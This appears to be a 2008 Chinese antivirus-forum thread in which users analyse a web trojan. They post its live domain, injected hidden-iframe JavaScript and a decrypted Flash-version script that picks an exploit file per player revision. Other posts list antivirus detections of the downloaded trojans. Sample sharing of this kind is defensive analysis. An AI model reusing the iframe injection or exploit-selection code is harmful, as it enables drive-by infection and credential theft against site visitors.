热忽忽的新网马

显示全部楼层 · 发表于 2008-8-23 10:55:45

http://fangaizheng.com.cn/count/js/gif.gif
就他了
document.writeln("<iframe style=display:none src=http:\/\/fangaizheng.com.cn\/count\/js\/swf2.htm><\/iframe>");document.writeln("<iframe style=display:none src=http:\/\/fangaizheng.com.cn\/count\/js\/old.htm><\/iframe>");document.writeln("<iframe style=display:none src=http:\/\/fangaizheng.com.cn\/count\/js\/tj.htm><\/iframe>");先解密了下swf2.htm里的内容为111
222
var version=deconcept.SWFObjectUtil.getPlayerVersion(); if(version['major']==9){document.getElementById('flashversion').innerHTML=""; if(version['rev']==115){var so=new SWFObject("WIN 9,0,115,0i.swf","mymovie","0.1","0.1","9","#000000"); so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("WIN 9,0,64,0i.swf","mymovie","0.1","0.1","9","#000000"); so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("WIN 9,0,47,0i.swf","mymovie","0.1","0.1","9","#000000"); so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("WIN 9,0,45,0i.swf","mymovie","0.1","0.1","9","#000000"); so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("WIN 9,0,28,0i.swf","mymovie","0.1","0.1","9","#000000"); so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("WIN 9,0,16,0i.swf","mymovie","0.1","0.1","9","#000000"); so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}} 解密地址为：http://count.xj.cn/count/js/css.css过23日瑞星

显示全部楼层 · 发表于 2008-8-23 10:57:39

kv 0

显示全部楼层 · 发表于 2008-8-23 11:00:23

火狐阻止：

已报告的攻击站点！

位于 fangaizheng.com.cn 的站点已经被报告为攻击网站，而且已根据您的安全首选项而阻止。
攻击站点会安装用于盗窃隐私信息的程序，或使用您的计算机来攻击其他人，或者损坏您的系统。

某些攻击站点故意发布有害软件，但是许多都没有在获得用户允许或者了解的情况下进行。

显示全部楼层 · 发表于 2008-8-23 11:10:00

2008-8-23 11:12:41 检测到: Trojan-Downloader.Win32.Agent.abya Internet Explorer http://count.xj.cn/count/js/css.css//FSG

显示全部楼层 · 发表于 2008-8-23 11:12:02

[DETECTION] Is the TR/Crypt.XPACK.Gen Trojan

[ 本帖最后由 granthill 于 2008-8-23 11:25 编辑 ]

显示全部楼层 · 发表于 2008-8-23 11:18:23

http://fangaizheng.com.cn/count/js/1.txt
脱壳解密后的东西

显示全部楼层 · 发表于 2008-8-23 11:55:57

2008-8-23 11:41:22 检测到: Trojan-PSW.Win32.LdPinch.xuy Internet Explorer http://bbs.kafan.cn/attachment.p ... 219462549//q.exe//#
2008-8-23 11:43:57 检测到: Trojan-GameThief.Win32.OnLineGames.sgri Internet Explorer http://bbs.kafan.cn/attachment.p ... =1219462804//cq.exe
2008-8-23 11:45:28 检测到: Worm.Win32.AutoRun.enw Internet Explorer http://bbs.kafan.cn/attachment.p ... xe//PE_Patch//UPack

显示全部楼层 · 发表于 2008-8-23 12:27:44

卡巴拦截了3个。第2个没反映哦

显示全部楼层 · 发表于 2008-8-23 12:30:34

红伞全拦～～

显示全部楼层 · 发表于 2008-8-23 17:16:00

F:\virus\cq.rar » RAR » cq.exe - a variant of Win32/PSW.Legendmir.NGG trojan - was a part of the deleted object
F:\virus\css.rar » RAR » css.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
F:\virus\hosts.rar » RAR » hosts.exe » RAR » hosts - Win32/Qhost trojan - was a part of the deleted object
F:\virus\se.rar » RAR » se.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object

[已鉴定] 热忽忽的新网马

评分